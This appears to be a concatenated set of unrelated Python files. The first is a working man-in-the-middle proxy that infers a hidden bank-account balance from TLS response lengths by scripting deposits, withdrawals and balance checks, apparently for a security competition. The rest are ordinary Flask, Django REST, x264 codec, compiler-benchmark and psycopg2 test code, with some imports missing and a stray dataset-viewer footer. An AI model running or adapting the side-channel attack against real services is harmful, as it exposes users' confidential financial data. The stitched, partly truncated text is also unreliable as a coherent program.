CLIENT2SERVER = 1
SERVER2CLIENT = 2
running = True
"""
"fast" TLS brute-force
@author: <NAME>
"""
MESSAGE_MARK = 1359
ERROR_MARK = 55
MESSAGE_ORDER = 3
MAX_AMOUNT_LEN = 9
MAX_FILE_LENGTH = 4
MAX_ACCOUNT_LENGTH = 4
NEW_COMMAND_FORMAT = '{ "type": "input",' \
' "input":{"input": ["-p","%PORT%","-i","%IP%",' \
'"-c","%IM_FILE%","-a","%IM_ACCOUNT%","-n","%IM_AMOUNT%"],"base64": false}}'
DEPOSIT_COMMAND_FORMAT = '{ "type": "input",' \
' "input":{"input": ["-p","%PORT%","-i","%IP%",' \
'"-c","%IM_FILE%","-a","%IM_ACCOUNT%","-d","%IM_AMOUNT%"],"base64": false}}'
WITHDRAW_COMMAND_FORMAT = '{ "type": "input",' \
' "input":{"input": ["-p","%PORT%","-i","%IP%",' \
'"-c","%IM_FILE%","-a","%IM_ACCOUNT%","-w","%IM_AMOUNT%"],"base64": false}}'
BALANCE_COMMAND_FORMAT = '{ "type": "input",' \
' "input":{"input": ["-p","%PORT%","-i","%IP%",' \
'"-c","%IM_FILE%","-a","%IM_ACCOUNT%","-g"],"base64": false}}'
amount_detected = ''
cur_amount_len = 0
next_digit = 0
last_digit = False
cur_file = 0
cur_file_name = None
cur_account = 0
cur_account_name = None
# 0: init (creating account)
# 1: sent acc created, 2: sent init withdraw (checking balance)
# 3: make withdraw/deposit
# 4: check balance
# 5: failed, 6: finished
cur_state = 0
cur_length = 0
cur_message = 0
def log(m):
print(m, file=sys.stderr)
def send_command(shared):
global cur_state
global cur_length
global amount_detected
global cur_amount_len
global next_digit
global last_digit
global cur_file
global cur_file_name
global cur_account
global cur_account_name
try:
if cur_state == 0:
cur_length = float("inf")
next_digit = 0
cur_file += 1
cur_file_name = str(cur_file).zfill(MAX_FILE_LENGTH)
cur_account += 1
cur_account_name = str(cur_account).zfill(MAX_ACCOUNT_LENGTH)
json_command = NEW_COMMAND_FORMAT.replace('%IM_FILE%', cur_file_name) \
.replace('%IM_ACCOUNT%', cur_account_name).replace('%IM_AMOUNT%', '%AMOUNT%')
log("[MITM]: found so far: %s" % amount_detected)
log("[MITM]: sending new: %s" % json_command)
elif cur_state == 1 and cur_amount_len > 0:
amount = amount_detected + str('').zfill(MAX_AMOUNT_LEN - cur_amount_len) + '.00'
json_command = WITHDRAW_COMMAND_FORMAT.replace('%IM_FILE%', cur_file_name) \
.replace('%IM_ACCOUNT%', cur_account_name).replace('%IM_AMOUNT%', amount)
log("[MITM]: found so far: %s" % amount_detected)
log("[MITM]: sending wit: %s" % json_command)
elif cur_state == 2 or (cur_state == 1 and cur_amount_len == 0):
cur_state = 2
json_command = BALANCE_COMMAND_FORMAT.replace('%IM_FILE%', cur_file_name) \
.replace('%IM_ACCOUNT%', cur_account_name)
log("[MITM]: found so far: %s -- current length: %d"
% (amount_detected, cur_length if cur_length != float('inf') else -1))
log("[MITM]: sending bal: %s" % json_command)
elif cur_state == 3:
if next_digit >= 10:
cur_state = 6
log("[MITM] failed to brute-force")
json_command = '{"type": "done"}'
else:
amount = '1' + str('').zfill(MAX_AMOUNT_LEN - cur_amount_len - 1) + '.00'
if last_digit:
json_command = DEPOSIT_COMMAND_FORMAT.replace('%IM_FILE%', cur_file_name) \
.replace('%IM_ACCOUNT%', cur_account_name).replace('%IM_AMOUNT%', amount)
next_digit += 1
log("[MITM]: found so far: %s -- current length: %d -- current digit: %d"
% (amount_detected, cur_length if cur_length != float('inf') else -1, next_digit))
log("[MITM]: sending dep - step: %s" % json_command)
else:
json_command = WITHDRAW_COMMAND_FORMAT.replace('%IM_FILE%', cur_file_name) \
.replace('%IM_ACCOUNT%', cur_account_name).replace('%IM_AMOUNT%', amount)
next_digit += 1
log("[MITM]: found so far: %s -- current length: %d -- current digit: %d"
% (amount_detected, cur_length if cur_length != float('inf') else -1, next_digit))
log("[MITM]: sending wit - step: %s" % json_command)
elif cur_state == 4:
json_command = BALANCE_COMMAND_FORMAT.replace('%IM_FILE%', cur_file_name) \
.replace('%IM_ACCOUNT%', cur_account_name)
log("[MITM]: found so far: %s -- current length: %d -- current digit: %d"
% (amount_detected, cur_length if cur_length != float('inf') else -1, next_digit))
log("[MITM]: sending bal: %s" % json_command)
else:
json_command = '{"type": "done"}'
log("[MITM]: invalid state")
# send to command server
command = json.loads(json_command)
shared.put(command, block=True)
except Exception:
log(traceback.format_exc())
def mitm(buff, direction, shared):
global cur_message
global cur_state
global cur_length
global amount_detected
global cur_amount_len
global next_digit
global last_digit
# hb = "".join("{:02x}".format(c) for c in buff)
if direction == CLIENT2SERVER:
# log("-> %d ->" % len(buff))
pass
elif direction == SERVER2CLIENT:
try:
if len(buff) == MESSAGE_MARK:
cur_message = 0
else:
cur_message += 1
if cur_message == MESSAGE_ORDER:
log("<- [%d] last digit = %s <-" % (len(buff), str(last_digit)))
if cur_state == 0 or cur_state == 1:
cur_state += 1
send_command(shared)
elif cur_state == 2:
cur_length = len(buff)
cur_state = 3
send_command(shared)
elif cur_state == 3:
if len(buff) == ERROR_MARK:
digit_found = 0
log("[MITM] found next digit: %s" % str(digit_found))
amount_detected += str(digit_found)
cur_amount_len += 1
if cur_amount_len < MAX_AMOUNT_LEN:
next_digit = 0
cur_state = 0
if cur_amount_len == MAX_AMOUNT_LEN - 1:
last_digit = True
send_command(shared)
else:
log("[MITM] found amount: %s" % amount_detected)
cur_state = 4
finish = {"type": "learned", "variable": "amount", "secret": int(amount_detected)}
shared.put(finish, block=True)
time.sleep(1)
finish = {"type": "done"}
shared.put(finish, block=True)
else:
cur_state += 1
send_command(shared)
elif cur_state == 4:
if ((len(buff) < cur_length and not last_digit)
or (len(buff) > cur_length and last_digit)):
digit_found = (10 - next_digit) if last_digit else next_digit
log("[MITM] found next digit: %s" % str(digit_found))
amount_detected += str(digit_found)
cur_amount_len += 1
if cur_amount_len < MAX_AMOUNT_LEN:
next_digit = 0
cur_state = 0
if cur_amount_len == MAX_AMOUNT_LEN - 1:
last_digit = True
send_command(shared)
else:
log("[MITM] found amount: %s" % amount_detected)
cur_state = 4
finish = {"type": "learned", "variable": "amount", "secret": int(amount_detected)}
shared.put(finish, block=True)
time.sleep(1)
finish = {"type": "done"}
shared.put(finish, block=True)
else:
cur_state = 3
send_command(shared)
# log("<- %d [%d] <-" % (len(buff), cur_message))
except Exception:
log(traceback.format_exc())
return buff
@contextmanager
def ignored(*exceptions):
try:
yield
except exceptions:
pass
def kill_p(a, b):
with ignored(Exception):
a.shutdown(socket.SHUT_RDWR)
a.close()
b.shutdown(socket.SHUT_RDWR)
b.close()
return
def worker(client, server, n, shared):
while running:
b = ""
with ignored(Exception):
b = client.recv(4096)
if len(b) == 0:
kill_p(client, server)
return
try:
b = mitm(b, n, shared)
except Exception:
pass
try:
server.send(b)
except Exception:
pass
kill_p(client, server)
return
kill_p(client, server)
return
def signal_handler(sn, sf):
global running
running = False
def do_proxy_main(port, remote_host, remote_port):
signal.signal(signal.SIGTERM, signal_handler)
workers = []
p = None
try:
shared = Queue()
p = threading.Thread(target=send_input, args=(args.c, args.d, shared))
p.start()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(("0.0.0.0", port))
s.listen(1)
send_command(shared)
while running:
k, a = s.accept()
v = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
v.connect((remote_host, remote_port))
t1 = threading.Thread(target=worker, args=(k, v, CLIENT2SERVER, shared))
t2 = threading.Thread(target=worker, args=(v, k, SERVER2CLIENT, shared))
t2.start()
t1.start()
workers.append((t1, t2, k, v))
except Exception:
pass
signal_handler(None, None)
for t1, t2, k, v in workers:
kill_p(k, v)
t1.join()
t2.join()
p.join()
return
def send_input(host, port, shared):
global running
while running:
try:
d = shared.get(block=True, timeout=0.01)
time.sleep(0.01)
r = requests.post("http://" + host + ":" + str(port), data={'REQUEST': json.dumps(d)})
log(r.text)
except Exception:
pass
time.sleep(0.01)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Proxy')
parser.add_argument('-p', type=int, default=4000, help="listen port")
parser.add_argument('-s', type=str, default="127.0.0.1", help="server ip address")
parser.add_argument('-q', type=int, default=3000, help="server port")
parser.add_argument('-c', type=str, default="127.0.0.1", help="command server")
parser.add_argument('-d', type=int, default=5000, help="command port")
args = parser.parse_args()
print("started")
sys.stdout.flush()
do_proxy_main(args.p, args.s, args.q)
|
<gh_stars>1-10
# -*- coding: utf-8 -*-
"""Admin models."""
import datetime as dt
from flask_login import UserMixin
from league.database import (Column, Model, SurrogatePK, db, reference_col,
relationship)
from league.extensions import bcrypt
class SiteSettings(SurrogatePK, Model):
"""Configuration data for the webapp."""
__tablename__ = 'site_settings'
key = Column(db.String(80), unique=True, nullable=False)
value = Column(db.String(80), nullable=False)
def __init__(self, key, value, **kwargs):
"""Create instance."""
db.Model.__init__(self, key=key, value=value, **kwargs)
def __repr__(self):
"""Represent instance as a unique string."""
return '<SiteSettings({key})>'.format(key=self.key)
@classmethod
def get_by_key(cls, key):
"""Get SiteSettings by key."""
return cls.query.filter_by(key=key).first()
@classmethod
def get_all(cls):
"""Get all SiteSettings."""
return cls.query.all()
class Role(SurrogatePK, Model):
"""A role for a user."""
__tablename__ = 'roles'
name = Column(db.String(80), unique=True, nullable=False)
user_id = reference_col('users', nullable=True)
user = relationship('User', backref='roles')
def __init__(self, name, **kwargs):
"""Create instance."""
db.Model.__init__(self, name=name, **kwargs)
def __repr__(self):
"""Represent instance as a unique string."""
return '<Role({name})>'.format(name=self.name)
class User(UserMixin, SurrogatePK, Model):
"""A user of the app."""
__tablename__ = 'users'
username = Column(db.String(80), unique=True, nullable=False)
email = Column(db.String(80), unique=True, nullable=False)
#: The hashed password
password = Column(db.Binary(128), nullable=True)
created_at = Column(db.DateTime, nullable=False, default=dt.datetime.utcnow)
first_name = Column(db.String(30), nullable=True)
last_name = Column(db.String(30), nullable=True)
active = Column(db.Boolean(), default=False)
is_admin = Column(db.Boolean(), default=False)
def __init__(self, username, email, password=<PASSWORD>, is_admin=False,
**kwargs):
"""Create instance."""
db.Model.__init__(self, username=username, email=email,
is_admin=is_admin, **kwargs)
if password:
self.set_password(password)
else:
self.password = None
def set_password(self, password):
"""Set password."""
self.password = <PASSWORD>_<PASSWORD>(password)
def check_password(self, value):
"""Check password."""
return bcrypt.check_password_hash(self.password, value)
@property
def full_name(self):
"""Full user name."""
return '{0} {1}'.format(self.first_name, self.last_name)
def __repr__(self):
"""Represent instance as a unique string."""
return '<User({username!r})>'.format(username=self.username)
@classmethod
def get_by_username(cls, username):
"""Get User by username."""
return cls.query.filter_by(username=username).first()
@classmethod
def get_all(cls):
"""Get all users."""
return cls.query.all()
@classmethod
def delete_by_id(cls, ids):
"""Delete users by id."""
cls.query.filter(User.id.in_(ids)).delete(synchronize_session=False)
db.session.commit()
|
<reponame>rajanramprasadh/profiles-rest-api<filename>src/profiles_project/profiles_api/views.py
from django.shortcuts import render
from rest_framework import viewsets, status, filters
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework.authentication import TokenAuthentication
from rest_framework.authtoken.serializers import AuthTokenSerializer
from rest_framework.authtoken.views import ObtainAuthToken
from rest_framework.permissions import IsAuthenticatedOrReadOnly, IsAuthenticated
from . import serializers, models, permissions
# Create your views here.
class HelloApiView(APIView):
"""Test API View."""
serializer_class = serializers.HelloSerializer
def get(self, request, format=None):
"""Retruns a list of APIView features"""
an_api_view = [
'Uses HTTP methods as function (get, post, patch, put, delete)',
'It is similar to traditional Django View',
'Gives you the most control over yout logic',
'Is mapped manually to URLs'
]
return Response({'message': 'Hello', 'an_api_view': an_api_view})
def post(self, request):
"""Create a hello messae with our name."""
serializer = serializers.HelloSerializer(data=request.data)
if serializer.is_valid():
name = serializer.data.get('name')
message = 'Hello {0}'.format(name)
return Response({'message': message})
else:
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
def put(self, request, pk=None):
"""Handles updating an object."""
return Response({'method': 'put'})
def patch(self, request, pk=None):
"""Patch request, only updates fields provided in the request."""
return Response({'method': 'patch'})
def delete(self, request, pk=None):
"""Deletes an object."""
return Response({'method': 'delete'})
class HelloViewSet(viewsets.ViewSet):
"""Test API Viewset."""
serializer_class = serializers.HelloSerializer
def list(self, request):
"""Return a hello message."""
a_viewset = [
'Uses actions (list, create, retrieve, update, partital_update)',
'Automatically maps to URLs using routers',
'Provides more functionality with less code.'
]
return Response({'message': 'Hello', 'a_viewset': a_viewset})
def create(self, request):
"""Create a new hello message"""
serializer = serializers.HelloSerializer(data=request.data)
if serializer.is_valid():
name = serializer.data.get('name')
message = 'Hello {0}'.format(name)
return Response({'message': message})
else:
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
def retrieve(self, request, pk=None):
"""Handles getting an objects by its ID."""
return Response({'httpd_method': 'GET'})
def update(self, request, pk=None):
"""Handles updating an object."""
return Response({'http_method': 'PUT'})
def partial_update(self, request, pk=None):
"""Handles updating part of an objects"""
return Response({'http_method': 'PATCH'})
def destroy(self, request, pk=None):
"""Handles removing an objects."""
return Response({'http_method': 'DELETE'})
class UserProfileViewSet(viewsets.ModelViewSet):
"""Handles creating, reading, updating profiles"""
serializer_class = serializers.UserProfileSerializer
queryset = models.UserProfile.objects.all()
authentication_classes = (TokenAuthentication,)
permission_classes = (permissions.UpdateOwnProfile,)
filter_backends = (filters.SearchFilter,)
search_fields = ('name', 'email',)
class LoginViewSet(viewsets.ViewSet):
"""Checks Email and password and returns auth token."""
serializer_class = AuthTokenSerializer
def create(self, request):
"""Use the obtain auth token API view to validate and create a token."""
return ObtainAuthToken().post(request)
class UserProfileFeedViewSet(viewsets.ModelViewSet):
"""Handles creating, reading and updating profiles feed items."""
authentication_classes = (TokenAuthentication,)
serializer_class = serializers.ProfileFeedItemSerializer
queryset = models.ProfileFeedItem.objects.all()
permission_classes = (permissions.PostOwnStatus, IsAuthenticated)
def perform_create(self, serializer):
"""Sets the user profile to the logged in user."""
serializer.save(user_profile=self.request.user)
|
# Copyright 2014 Google.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""X264 codec definition.
This file defines how to run encode and decode for the x264 implementation
of H.264.
"""
import encoder
import file_codec
import subprocess
class X264Codec(file_codec.FileCodec):
def __init__(self, name='x264', formatter=None):
super(X264Codec, self).__init__(
name,
formatter=(formatter or encoder.OptionFormatter(prefix='--', infix=' ')))
self.extension = 'mkv'
self.option_set = encoder.OptionSet(
encoder.Option('preset', ['ultrafast', 'superfast', 'veryfast',
'faster', 'fast', 'medium', 'slow', 'slower',
'veryslow', 'placebo']),
encoder.Option('rc-lookahead', ['0', '30', '60']),
encoder.Option('vbv-init', ['0.5', '0.8', '0.9']),
encoder.Option('ref', ['1', '2', '3', '16']),
encoder.ChoiceOption(['use-vbv-maxrate']),
encoder.Option('profile', ['baseline', 'main', 'high']),
encoder.Option('tune', ['psnr', 'ssim']),
# Experimentation on a 6-core, 12-thread system shows some gains on
# large videos for thread values up to the thread count, and up to the
# core count on smaller videos.
# There is some damage to PSNR with more threads.
encoder.IntegerOption('threads', 1, 6).Mandatory(),
encoder.DummyOption('vbv-maxrate'),
encoder.DummyOption('vbv-bufsize'),
)
def StartEncoder(self, context):
return encoder.Encoder(context, encoder.OptionValueSet(
self.option_set,
'--preset slow --tune psnr --threads 1',
formatter=self.option_formatter))
def EncodeCommandLine(self, parameters, bitrate, videofile, encodedfile):
# The use-vbv-maxrate flag controls whether vbv-maxrate/vbv-bufsize
# are used. They may be unneeded.
# Still no opinion: '--no-scenecut --keyint infinite '
if parameters.HasValue('use-vbv-maxrate'):
parameters = parameters.RemoveValue('use-vbv-maxrate')
parameters = parameters.ChangeValue('vbv-maxrate', str(bitrate))
parameters = parameters.ChangeValue('vbv-bufsize', str(bitrate))
commandline = ('%(x264)s '
'--bitrate %(bitrate)d --fps %(framerate)d '
'--input-res %(width)dx%(height)d '
'--quiet '
'%(parameters)s '
'-o %(outputfile)s %(inputfile)s') % {
'x264': encoder.Tool('x264'),
'bitrate': bitrate,
'framerate': videofile.framerate,
'width': videofile.width,
'height': videofile.height,
'outputfile': encodedfile,
'inputfile': videofile.filename,
'parameters': parameters.ToString()}
return commandline
def DecodeCommandLine(self, videofile, encodedfile, yuvfile):
commandline = '%s -loglevel error -i %s %s' % (encoder.Tool("ffmpeg"),
encodedfile, yuvfile)
return commandline
def ResultData(self, encodedfile):
more_results = {}
more_results['frame'] = file_codec.MatroskaFrameInfo(encodedfile)
return more_results
def EncoderVersion(self):
version_output = subprocess.check_output([encoder.Tool('x264'),
'--version'])
# The version is the first line of output.
return version_output.split('\n')[0]
|
"""
Copyright 2021 <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
from absl import app, flags, logging
from tqdm import tqdm
from optcache.essentials import IO
from optcache.essentials import Goals
from optcache.essentials import Engine
flags.DEFINE_list('levels',
['O0', 'O1', 'O2', 'O3', 'Os', 'Oz'],
'Compiler optimization levels')
def execute(argv):
"""Generate random sequences for each benchmark"""
del argv
FLAGS = flags.FLAGS
# The benchmarks
benchmarks = IO.load_yaml(FLAGS.benchmarks_filename)
if not benchmarks:
logging.fatal('There are no benchmarks to process')
# Create the results directory
try:
os.makedirs(FLAGS.results_directory)
except FileExistsError:
pass
# Process each benchmark
for benchmark in tqdm(benchmarks, desc='Processing'):
index = benchmark.find('.')
bench_dir = benchmark[:index]
bench_name = benchmark[index+1:]
bench_in_dir = os.path.join(FLAGS.benchmarks_directory,
bench_dir,
bench_name)
if not os.path.isdir(bench_in_dir):
continue
bench_out_dir = os.path.join(FLAGS.results_directory,
bench_dir)
# Create the results directory for the suite
try:
os.makedirs(bench_out_dir)
except FileExistsError:
pass
filename = '{}/{}.yaml'.format(bench_out_dir, bench_name)
if FLAGS.verify_report and os.path.isfile(filename):
continue
results = {}
for compiler in ['opt', 'llvm']:
for level in FLAGS.levels:
goal_value = Engine.evaluate(
Goals.prepare_goals(FLAGS.goals, FLAGS.weights),
'-{}'.format(level),
compiler,
bench_in_dir,
FLAGS.working_set,
FLAGS.times,
FLAGS.tool,
FLAGS.verify_output
)
compiler_name = 'clang' if compiler == 'llvm' else 'opt'
if compiler_name not in results:
results[compiler_name] = {}
results[compiler_name][level] = {'goal': goal_value,
'seq': ['-{}'.format(level)]}
IO.dump_yaml(results, filename)
# Execute
if __name__ == '__main__':
# app
flags.DEFINE_string('benchmarks_filename',
None,
'Benchmarks')
flags.DEFINE_string('results_directory',
None,
'Results directory')
flags.DEFINE_boolean('verify_report',
True,
'Do not process the benchmark if a report exists')
flags.DEFINE_list('goals',
None,
'Goals')
flags.DEFINE_list('weights',
None,
'Weights')
flags.DEFINE_string('benchmarks_directory',
None,
'Benchmarks directory')
flags.DEFINE_integer('working_set',
0,
'Working set',
lower_bound=0)
flags.DEFINE_integer('times',
3,
'Execution/compile times',
lower_bound=3)
flags.DEFINE_enum('tool',
'perf',
['perf', 'hyperfine'],
'Execution tool')
flags.DEFINE_boolean('verify_output',
False,
'The value of the goal is only valid if the ouput is correct')
flags.mark_flag_as_required('goals')
flags.mark_flag_as_required('weights')
flags.mark_flag_as_required('benchmarks_filename')
flags.mark_flag_as_required('benchmarks_directory')
flags.mark_flag_as_required('results_directory')
app.run(execute)
|
#!/usr/bin/env python
# test_copy.py - unit test for COPY support
#
# Copyright (C) 2010-2011 <NAME> <<EMAIL>>
#
# psycopg2 is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# In addition, as a special exception, the copyright holders give
# permission to link this program with the OpenSSL library (or with
# modified versions of OpenSSL that use the same license as OpenSSL),
# and distribute linked combinations including the two.
#
# You must obey the GNU Lesser General Public License in all respects for
# all of the code used other than OpenSSL.
#
# psycopg2 is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public
# License for more details.
import sys
import string
from .testutils import (unittest, ConnectingTestCase, decorate_all_tests,
skip_if_no_iobase, skip_before_postgres, slow)
from io import StringIO
from itertools import cycle
from subprocess import Popen, PIPE
import psycopg2
import psycopg2.extensions
from .testutils import skip_copy_if_green, script_to_py3
from .testconfig import dsn
if sys.version_info[0] < 3:
_base = object
else:
from io import TextIOBase as _base
class MinimalRead(_base):
"""A file wrapper exposing the minimal interface to copy from."""
def __init__(self, f):
self.f = f
def read(self, size):
return self.f.read(size)
def readline(self):
return self.f.readline()
class MinimalWrite(_base):
"""A file wrapper exposing the minimal interface to copy to."""
def __init__(self, f):
self.f = f
def write(self, data):
return self.f.write(data)
class CopyTests(ConnectingTestCase):
def setUp(self):
ConnectingTestCase.setUp(self)
self._create_temp_table()
def _create_temp_table(self):
curs = self.conn.cursor()
curs.execute('''
CREATE TEMPORARY TABLE tcopy (
id serial PRIMARY KEY,
data text
)''')
@slow
def test_copy_from(self):
curs = self.conn.cursor()
try:
self._copy_from(curs, nrecs=1024, srec=10 * 1024, copykw={})
finally:
curs.close()
@slow
def test_copy_from_insane_size(self):
# Trying to trigger a "would block" error
curs = self.conn.cursor()
try:
self._copy_from(curs, nrecs=10 * 1024, srec=10 * 1024,
copykw={'size': 20 * 1024 * 1024})
finally:
curs.close()
def test_copy_from_cols(self):
curs = self.conn.cursor()
f = StringIO()
for i in range(10):
f.write("%s\n" % (i,))
f.seek(0)
curs.copy_from(MinimalRead(f), "tcopy", columns=['id'])
curs.execute("select * from tcopy order by id")
self.assertEqual([(i, None) for i in range(10)], curs.fetchall())
def test_copy_from_cols_err(self):
curs = self.conn.cursor()
f = StringIO()
for i in range(10):
f.write("%s\n" % (i,))
f.seek(0)
def cols():
raise ZeroDivisionError()
yield 'id'
self.assertRaises(ZeroDivisionError,
curs.copy_from, MinimalRead(f), "tcopy", columns=cols())
@slow
def test_copy_to(self):
curs = self.conn.cursor()
try:
self._copy_from(curs, nrecs=1024, srec=10 * 1024, copykw={})
self._copy_to(curs, srec=10 * 1024)
finally:
curs.close()
@skip_if_no_iobase
def test_copy_text(self):
self.conn.set_client_encoding('latin1')
self._create_temp_table() # the above call closed the xn
if sys.version_info[0] < 3:
abin = ''.join(map(chr, list(range(32, 127)) + list(range(160, 256))))
about = abin.decode('latin1').replace('\\', '\\\\')
else:
abin = bytes(list(range(32, 127)) + list(range(160, 256))).decode('latin1')
about = abin.replace('\\', '\\\\')
curs = self.conn.cursor()
curs.execute('insert into tcopy values (%s, %s)',
(42, abin))
import io
f = io.StringIO()
curs.copy_to(f, 'tcopy', columns=('data',))
f.seek(0)
self.assertEqual(f.readline().rstrip(), about)
@skip_if_no_iobase
def test_copy_bytes(self):
self.conn.set_client_encoding('latin1')
self._create_temp_table() # the above call closed the xn
if sys.version_info[0] < 3:
abin = ''.join(map(chr, list(range(32, 127)) + list(range(160, 255))))
about = abin.replace('\\', '\\\\')
else:
abin = bytes(list(range(32, 127)) + list(range(160, 255))).decode('latin1')
about = abin.replace('\\', '\\\\').encode('latin1')
curs = self.conn.cursor()
curs.execute('insert into tcopy values (%s, %s)',
(42, abin))
import io
f = io.BytesIO()
curs.copy_to(f, 'tcopy', columns=('data',))
f.seek(0)
self.assertEqual(f.readline().rstrip(), about)
@skip_if_no_iobase
def test_copy_expert_textiobase(self):
self.conn.set_client_encoding('latin1')
self._create_temp_table() # the above call closed the xn
if sys.version_info[0] < 3:
abin = ''.join(map(chr, list(range(32, 127)) + list(range(160, 256))))
abin = abin.decode('latin1')
about = abin.replace('\\', '\\\\')
else:
abin = bytes(list(range(32, 127)) + list(range(160, 256))).decode('latin1')
about = abin.replace('\\', '\\\\')
import io
f = io.StringIO()
f.write(about)
f.seek(0)
curs = self.conn.cursor()
psycopg2.extensions.register_type(
psycopg2.extensions.UNICODE, curs)
curs.copy_expert('COPY tcopy (data) FROM STDIN', f)
curs.execute("select data from tcopy;")
self.assertEqual(curs.fetchone()[0], abin)
f = io.StringIO()
curs.copy_expert('COPY tcopy (data) TO STDOUT', f)
f.seek(0)
self.assertEqual(f.readline().rstrip(), about)
# same tests with setting size
f = io.StringIO()
f.write(about)
f.seek(0)
exp_size = 123
# hack here to leave file as is, only check size when reading
real_read = f.read
def read(_size, f=f, exp_size=exp_size):
self.assertEqual(_size, exp_size)
return real_read(_size)
f.read = read
curs.copy_expert('COPY tcopy (data) FROM STDIN', f, size=exp_size)
curs.execute("select data from tcopy;")
self.assertEqual(curs.fetchone()[0], abin)
def _copy_from(self, curs, nrecs, srec, copykw):
f = StringIO()
for i, c in zip(range(nrecs), cycle(string.ascii_letters)):
l = c * srec
f.write("%s\t%s\n" % (i, l))
f.seek(0)
curs.copy_from(MinimalRead(f), "tcopy", **copykw)
curs.execute("select count(*) from tcopy")
self.assertEqual(nrecs, curs.fetchone()[0])
curs.execute("select data from tcopy where id < %s order by id",
(len(string.ascii_letters),))
for i, (l,) in enumerate(curs):
self.assertEqual(l, string.ascii_letters[i] * srec)
def _copy_to(self, curs, srec):
f = StringIO()
curs.copy_to(MinimalWrite(f), "tcopy")
f.seek(0)
ntests = 0
for line in f:
n, s = line.split()
if int(n) < len(string.ascii_letters):
self.assertEqual(s, string.ascii_letters[int(n)] * srec)
ntests += 1
self.assertEqual(ntests, len(string.ascii_letters))
def test_copy_expert_file_refcount(self):
class Whatever(object):
pass
f = Whatever()
curs = self.conn.cursor()
self.assertRaises(TypeError,
curs.copy_expert, 'COPY tcopy (data) FROM STDIN', f)
def test_copy_no_column_limit(self):
cols = ["c%050d" % i for i in range(200)]
curs = self.conn.cursor()
curs.execute('CREATE TEMPORARY TABLE manycols (%s)' % ',\n'.join(
["%s int" % c for c in cols]))
curs.execute("INSERT INTO manycols DEFAULT VALUES")
f = StringIO()
curs.copy_to(f, "manycols", columns=cols)
f.seek(0)
self.assertEqual(f.read().split(), ['\\N'] * len(cols))
f.seek(0)
curs.copy_from(f, "manycols", columns=cols)
curs.execute("select count(*) from manycols;")
self.assertEqual(curs.fetchone()[0], 2)
@skip_before_postgres(8, 2) # they don't send the count
def test_copy_rowcount(self):
curs = self.conn.cursor()
curs.copy_from(StringIO('aaa\nbbb\nccc\n'), 'tcopy', columns=['data'])
self.assertEqual(curs.rowcount, 3)
curs.copy_expert(
"copy tcopy (data) from stdin",
StringIO('ddd\neee\n'))
self.assertEqual(curs.rowcount, 2)
curs.copy_to(StringIO(), "tcopy")
self.assertEqual(curs.rowcount, 5)
curs.execute("insert into tcopy (data) values ('fff')")
curs.copy_expert("copy tcopy to stdout", StringIO())
self.assertEqual(curs.rowcount, 6)
def test_copy_rowcount_error(self):
curs = self.conn.cursor()
curs.execute("insert into tcopy (data) values ('fff')")
self.assertEqual(curs.rowcount, 1)
self.assertRaises(psycopg2.DataError,
curs.copy_from, StringIO('aaa\nbbb\nccc\n'), 'tcopy')
self.assertEqual(curs.rowcount, -1)
@slow
def test_copy_from_segfault(self):
# issue #219
script = ("""\
import psycopg2
conn = psycopg2.connect(%(dsn)r)
curs = conn.cursor()
curs.execute("create table copy_segf (id int)")
try:
curs.execute("copy copy_segf from stdin")
except psycopg2.ProgrammingError:
pass
conn.close()
""" % {'dsn': dsn})
proc = Popen([sys.executable, '-c', script_to_py3(script)])
proc.communicate()
self.assertEqual(0, proc.returncode)
@slow
def test_copy_to_segfault(self):
# issue #219
script = ("""\
import psycopg2
conn = psycopg2.connect(%(dsn)r)
curs = conn.cursor()
curs.execute("create table copy_segf (id int)")
try:
curs.execute("copy copy_segf to stdout")
except psycopg2.ProgrammingError:
pass
conn.close()
""" % {'dsn': dsn})
proc = Popen([sys.executable, '-c', script_to_py3(script)], stdout=PIPE)
proc.communicate()
self.assertEqual(0, proc.returncode)
def test_copy_from_propagate_error(self):
class BrokenRead(_base):
def read(self, size):
return 1 / 0
def readline(self):
return 1 / 0
curs = self.conn.cursor()
# It seems we cannot do this, but now at least we propagate the error
# self.assertRaises(ZeroDivisionError,
# curs.copy_from, BrokenRead(), "tcopy")
try:
curs.copy_from(BrokenRead(), "tcopy")
except Exception as e:
self.assertTrue('ZeroDivisionError' in str(e))
def test_copy_to_propagate_error(self):
class BrokenWrite(_base):
def write(self, data):
return 1 / 0
curs = self.conn.cursor()
curs.execute("insert into tcopy values (10, 'hi')")
self.assertRaises(ZeroDivisionError,
curs.copy_to, BrokenWrite(), "tcopy")
decorate_all_tests(CopyTests, skip_copy_if_green)
def test_suite():
return unittest.TestLoader().loadTestsFromName(__name__)
if __name__ == "__main__":
unittest.main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.